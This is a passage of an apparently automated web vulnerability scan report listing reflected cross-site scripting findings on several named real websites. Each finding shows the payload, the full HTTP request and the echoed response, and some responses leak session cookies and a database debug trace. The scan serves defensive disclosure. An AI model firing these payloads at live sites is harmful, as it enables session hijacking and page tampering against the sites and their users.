<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...
7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939e9"><script>alert(1)</script>da3114cdcf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a&start=8&skip=features">
...[SNIP]...
7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c63b"><script>alert(1)</script>46c4dffc34d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:04 GMT
Server: lighttpd/1.4.28
Content-Length: 112248


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d?start=8&skip=features">
...[SNIP]...
7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9bd4"-alert(1)-"de46a400726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof9bd4"-alert(1)-"de46a400726 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=g0ij568rmka3ulclrpt5nhoec4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.icof9bd4"-alert(1)-"de46a400726</TITLE>
<meta name="description" content="Jho
...[SNIP]...
<script type="text/javascript">
function vp(uname)
{
   window.location.href = "http://profiles.jhoos.com/"+uname;
}
function pg(pg)
{
   window.location.href = "http://www.jhoos.com/favicon.icof9bd4"-alert(1)-"de46a400726--"+pg;
}
</script>
...[SNIP]...
7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17e5b<a>fb17bacaecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico17e5b<a>fb17bacaecf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=bsf5hppdchrs7ogv1uva6oq6j4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6872

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.ico17e5b<a>fb17bacaecf</TITLE>
<meta name="description" content="Jhoos is a S
...[SNIP]...
<h2>Favicon.ico17e5b<a>fb17bacaecf - Social Networking Service</h2>
...[SNIP]...
7.79. http://www.jhoos.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ab3"><a>93ba235f49e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico66ab3"><a>93ba235f49e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=in94nd37n4bgqenf549sce0po2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:16 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.ico66ab3"><a>93ba235f49e</TITLE>
<meta name="description" content="Jhoos is a Social Networking service in Favicon.ico66ab3"><a>93ba235f49e. No subscription fees and lifetime membership with text and audio video chat features. Download now and join Jhoos to meet your soulmate.">
...[SNIP]...
7.80. http://www.lenox.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173eb"><a>a0411f48fb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico173eb"><a>a0411f48fb2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:56:31 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=15918175;expires=Tue, 23-Apr-2041 23:56:32 GMT;path=/
Set-Cookie: CFTOKEN=981019a1f9e493e2-ADFDF4B8-BFA4-2A91-25D8EA90828DDE67;expires=Tue, 23-Apr-2041 23:56:32 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<a href="/404handler.cfm?inbound=?404;http://www.lenox.com/favicon.ico173eb"><a>a0411f48fb2&forceLogin=1">
...[SNIP]...
7.81. http://www.lenox.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.lenox.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85b0a"><a>2482c2c1d93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico?85b0a"><a>2482c2c1d93=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lenox.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 404 Not Found
Server: Microsoft-IIS/5.0
Date: Sun, 01 May 2011 23:55:55 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: CFID=15918082;expires=Tue, 23-Apr-2041 23:55:55 GMT;path=/
Set-Cookie: CFTOKEN=bc814721ef0ecd70-ADFD650B-A288-A196-8159C84365A59A5F;expires=Tue, 23-Apr-2041 23:55:55 GMT;path=/
Content-Type: text/html; charset=UTF-8


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
       <head>

           <
...[SNIP]...
<a href="/404handler.cfm?inbound=?404;http://www.lenox.com/favicon.ico?85b0a"><a>2482c2c1d93=1&forceLogin=1">
...[SNIP]...
7.82. http://www.mygiftcardsite.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mygiftcardsite.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e95"><script>alert(1)</script>95ad170de98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?47e95"><script>alert(1)</script>95ad170de98=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mygiftcardsite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 442


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Manage Your Gift Card </title>

</head>
<frameset rows="100%,*" border
...[SNIP]...
<frame src="http://www.kpfprepaid.com/mygiftcardsite//favicon.ico?47e95"><script>alert(1)</script>95ad170de98=1" frameborder="0" />
...[SNIP]...
7.83. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb710<img%20src%3da%20onerror%3dalert(1)>f86d9201f7 was submitted in the REST URL parameter 5. This input was echoed as bb710<img src=a onerror=alert(1)>f86d9201f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797bb710<img%20src%3da%20onerror%3dalert(1)>f86d9201f7/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:46 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55819


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 1797bb710<img src=a onerror=alert(1)>f86d9201f7 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.84. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4959'%3b64a48987fe2 was submitted in the REST URL parameter 5. This input was echoed as e4959';64a48987fe2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1797e4959'%3b64a48987fe2/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:40 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:53:40 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 50755


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797e4959';64a48987fe2/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.85. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2234c"><img%20src%3da%20onerror%3dalert(1)>163cbf2dcf5 was submitted in the REST URL parameter 5. This input was echoed as 2234c"><img src=a onerror=alert(1)>163cbf2dcf5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17972234c"><img%20src%3da%20onerror%3dalert(1)>163cbf2dcf5/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/17972234c"><img src=a onerror=alert(1)>163cbf2dcf5/N" title="SEO Quotient for ">
...[SNIP]...
7.86. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0d36'%3bff7a243e32d was submitted in the REST URL parameter 6. This input was echoed as c0d36';ff7a243e32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1797/Nc0d36'%3bff7a243e32d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797/Nc0d36';ff7a243e32d';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.87. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 96a80<img%20src%3da%20onerror%3dalert(1)>b27d9153174 was submitted in the REST URL parameter 6. This input was echoed as 96a80<img src=a onerror=alert(1)>b27d9153174 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797/N96a80<img%20src%3da%20onerror%3dalert(1)>b27d9153174 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:14 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:15 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>b27d9153174" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1797/N96a80<img src=a onerror=alert(1)>b27d9153174ddd</a>
...[SNIP]...
7.88. http://www.seoq.com/quotient/2011/04/22/1797/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2db8"><img%20src%3da%20onerror%3dalert(1)>1717bae1296 was submitted in the REST URL parameter 6. This input was echoed as f2db8"><img src=a onerror=alert(1)>1717bae1296 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/1797/Nf2db8"><img%20src%3da%20onerror%3dalert(1)>1717bae1296 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:11 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:11 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/1797/Nf2db8"><img src=a onerror=alert(1)>1717bae1296" title="SEO Quotient for ">
...[SNIP]...
7.89. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3cde8<img%20src%3da%20onerror%3dalert(1)>ac3da70dbcd was submitted in the REST URL parameter 5. This input was echoed as 3cde8<img src=a onerror=alert(1)>ac3da70dbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/17983cde8<img%20src%3da%20onerror%3dalert(1)>ac3da70dbcd/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:15 GMT
Server: Apache
Set-Cookie: CAKEPHP=klvfjcoqnigb9gf7llh10nva93; expires=Mon, 09-May-2011 02:52:16 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 17983cde8<img src=a onerror=alert(1)>ac3da70dbcd and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...
7.90. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 907d9'%3b9801195d799 was submitted in the REST URL parameter 5. This input was echoed as 907d9';9801195d799 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1798907d9'%3b9801195d799/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:09 GMT
Server: Apache
Set-Cookie: CAKEPHP=9l1il1vf6rn9o4vqk2b9euqg23; expires=Mon, 09-May-2011 02:52:09 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798907d9';9801195d799/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...
7.91. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

